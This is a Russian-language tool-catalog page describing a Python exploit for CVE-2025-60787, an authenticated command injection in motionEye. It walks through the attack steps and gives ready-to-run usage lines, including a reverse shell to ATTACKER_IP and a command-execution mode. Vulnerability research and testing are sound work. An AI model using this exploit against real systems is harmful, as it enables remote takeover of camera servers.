Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-60787-POC — Python PoC для CVE-2025-60787 — аутентифицированная RCE через внедрение OS-команд в motionEye <= 0.43.1b4 посредством несанитизированной конфигурации image_file_name | Kitploit
Инструменты/GitHubGitHub/d3vn0mi/cve-2025-60787-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHubd3vn0mi/cve-2025-60787-poc

CVE-2025-60787-POC

Python PoC для CVE-2025-60787 — аутентифицированная RCE через внедрение OS-команд в motionEye <= 0.43.1b4 посредством несанитизированной конфигурации image_file_name

Репозиторий
26 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-60787 - motionEye Authenticated RCE

Аутентифицированное удалённое выполнение кода в motionEye <= 0.43.1b4 через несанитизированный параметр конфигурации motion

Автор: d3vn0mi


Обзор уязвимости

ПолеДетали
CVE IDCVE-2025-60787
CVSS Score7.2 (High)
TypeOS Command Injection (CWE-78)
AffectedmotionEye <= 0.43.1b4
Fixed in0.43.1b5

motionEye принимает произвольные строки в полях конфигурации, таких как image_file_name, и записывает их напрямую в конфигурационные файлы Motion (/etc/motioneye/camera-*.conf). Когда служба Motion перезапускается, она интерпретирует эти поля как строки с раскрытием shell, что позволяет аутентифицированному злоумышленнику внедрять и выполнять произвольные команды ОС.

Веб-интерфейс включает клиентскую валидацию этих полей, но её можно тривиально обойти, отправляя поддельные API-запросы напрямую.

Вектор атаки

  1. Выполните аутентификацию в motionEye с действительными учётными данными администратора
  2. Получите список конфигураций камер
  3. Отправьте POST-запрос с изменённой конфигурацией, содержащей вредоносное значение image_file_name
  4. Motion обрабатывает внедрённую команду при создании снимков (через capture_mode: interval-snapshots)

Требования

  • Python 3.6+
  • Библиотека requests
  • Действительные учётные данные администратора motionEye
  • Сетевой доступ к целевому экземпляру motionEye

Установка

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2025-60787-POC.git
cd CVE-2025-60787-POC
pip install -r requirements.txt

Использование

Эксплойт поддерживает два режима: reverse shell и выполнение команд.

Reverse Shell

Запустите слушатель на своей машине, затем выполните:

root@kitploit:~
python3 exploit.py revshell \
    --url http://TARGET:8765 \
    --user admin \
    --password SECRET \
    -i ATTACKER_IP \
    --port 4444

Выполнение команд

root@kitploit:~
python3 exploit.py command \
    --url http://TARGET:8765 \
    --user admin \
    --password SECRET \
    -e "id; whoami"

Параметры

ФлагОписание
--urlURL целевого motionEye, включая порт
--userИмя пользователя motionEye
--passwordПароль motionEye
-i / --hostIP-адрес слушателя (режим revshell)
--portПорт слушателя (режим revshell)
-e / --execКоманда для выполнения (режим command)
--camera-idНацеливание на конкретный ID камеры
--shИспользовать /bin/sh вместо /bin/bash
--no-verifyПропустить проверку TLS-сертификата
--proxyНаправлять трафик через прокси (например, http://127.0.0.1:8080)

Ссылки

  • GitHub Advisory - GHSA-j945-qm58-4gjx
  • Exploit-DB #52481
  • Rapid7 Metasploit Module
  • motionEye Project

Авторы

  • d3vn0mi - Разработка эксплойта и инструментов
  • gunzf0x - Первоначальное обнаружение и исследование CVE

Отказ от ответственности

Этот инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам противозаконен. Автор не несёт ответственности за неправомерное использование данного программного обеспечения. Всегда получайте соответствующее разрешение перед проведением тестирования.

Лицензия

Этот проект лицензирован в соответствии с лицензией MIT.

Скачать инструмент